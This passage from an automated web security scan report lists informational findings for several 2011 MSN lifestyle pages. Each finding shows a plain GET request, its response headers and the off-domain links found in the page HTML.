<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406210&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.109. http://lifestyle.redacted/your-life/new-year-new-you/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/new-year-new-you/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/new-year-new-you/video.aspx?vid=416830b2-ec67-4155-ba51-efe3faacecec&from=en-us_msnhp&gt1=32094 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA08
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=06e0edd4cfcc41db868ded2e7f6b8068; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2E0ADAEA08344EB3BE3AB3102B928D27; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344845&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fnew-year-new-you%2Fvideo.aspx%3Fvid%3D416830b2-ec67-4155-ba51-efe3faacecec%26from%3Den-us_msnhp%26gt1%3D32094&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.110. http://lifestyle.redacted/your-life/your-money-today/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ea234a142c804af5831ec7272a1550e5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=40EFBA27B80947FF988D1B47905AC12F; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344845&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.parenting.com/"><img src="http://blstb.redacted/i/71/CEF1BAE2CE10402EF4C51A46D486.jpg" width="150" height="29" alt="parenting.com" />
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn">The Best iPhone Apps For Kids and Parents</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn">Totally Ridiculous Parenting Products</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn">Top 10 Baby Names of 2010</a>
...[SNIP]...
<li><a href="http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn">8 Discipline Mistakes Parents Make</a>
...[SNIP]...
<li><a href="http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/">For more great mom-tested tricks, get a free trial issue of Parenting now!</a>
...[SNIP]...
<p><a href="http://www.facebook.com/MSNLife"><img src="http://blstb.redacted/i/8B/1FC16DD76C3B9D615FC9D59FC47E.gif" width="170" height="55" alt="Like MSN Lifestyle on Facebook" class="img0" />
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;OCID=TWT">Tweet</a>
...[SNIP]...
e','1');" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;page=4&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
);" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;page=4&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><iframe src="http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300" scrolling="no" height="385px" width="300px" frameBorder="0" allowTransparency="true"><a href="http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6">TODAY Money Live Chat</a>
...[SNIP]...
<li><a href="http://www.bundle.com/MyMoney">Bundle.com: Uncomplicate your money</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.111. http://lifestyle.redacted/your-life/your-money-today/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/your-money-today/article.aspx?cp-documentid=27387034&gt1=32078 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:05 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=ed8d9aacf7ca42c98902b5a735c56181; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0440C6673621460E890862207F751E00; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:05 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 40171

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406205&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-life%2Fyour-money-today%2Farticle.aspx%3Fcp-documentid%3D27387034%26gt1%3D32078&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
<area href="http://lifestyle.redacted/your-life/your-money-today/" alt="Your Money Today" shape="rect" coords="0,0,647,79" /><area href="http://money.todayshow.com" alt="Your Money on Today Show" shape="rect" coords="888,53,964,81" /><area href="http://money.msn.com/saving-money/video.aspx" alt="Your Money on MSN Money" shape="rect" coords="811,51,872,81" /><area href="http://www.bankofamerica.com/solutions" alt="Bank of America" shape="rect" coords="822,8,964,53" /></map>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js"></script>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.parenting.com/"><img src="http://blstb.redacted/i/71/CEF1BAE2CE10402EF4C51A46D486.jpg" width="150" height="29" alt="parenting.com" />
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/25-iphone-apps-for-kids?cid=msn">The Best iPhone Apps For Kids and Parents</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Mom/Ridiculous-Parenting-Products?cid=msn">Totally Ridiculous Parenting Products</a>
...[SNIP]...
<li><a href="http://www.parenting.com/gallery/Baby/Top-Girl-Baby-Names?cid=msn">Top 10 Baby Names of 2010</a>
...[SNIP]...
<li><a href="http://www.parenting.com/article/Toddler/Behavior/8-Discipline-Mistakes-Parents-Make?cid=msn">8 Discipline Mistakes Parents Make</a>
...[SNIP]...
<li><a href="http://parentingearlyyears.bonniersubscriptions.com/HBX0-SITEWIDE-PEY/">For more great mom-tested tricks, get a free trial issue of Parenting now!</a>
...[SNIP]...
<p><a href="http://www.facebook.com/MSNLife"><img src="http://blstb.redacted/i/8B/1FC16DD76C3B9D615FC9D59FC47E.gif" width="170" height="55" alt="Like MSN Lifestyle on Facebook" class="img0" />
...[SNIP]...
<div class="twitter" style="width:100px;float:left"><a href="http://twitter.com/share" class="twitter-share-button" data-url="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;OCID=TWT">Tweet</a>
...[SNIP]...
e','1');" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;page=0&amp;rrurt=1&amp;rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
);" href="http://lifestyle.redacted/your-life/your-money-today/article.aspx?cp-documentid=27387034&amp;page=0&amp;rrurt=0&amp;rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><iframe src="http://www.coveritlive.com/index2.php/option=com_altcaster/task=viewaltcast/altcast_code=207bf850f8/height=385/width=300" scrolling="no" height="385px" width="300px" frameBorder="0" allowTransparency="true"><a href="http://www.coveritlive.com/mobile.php/option=com_mobile/task=viewaltcast/altcast_code=5895e5f0d6">TODAY Money Live Chat</a>
...[SNIP]...
<li><a href="http://www.bundle.com/MyMoney">Bundle.com: Uncomplicate your money</a>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.112. http://lifestyle.redacted/your-life/your-money-today/video.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-life/your-money-today/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-life/your-money-today/video.aspx?vid=44eb5873-9b59-48a2-9bc9-e3a313f766a5 HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:03 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8c3f2785a695425c8e070c562d257e9e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=3353B973AC5D4E3F95631EDDBD6A012F; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:03 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 18327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
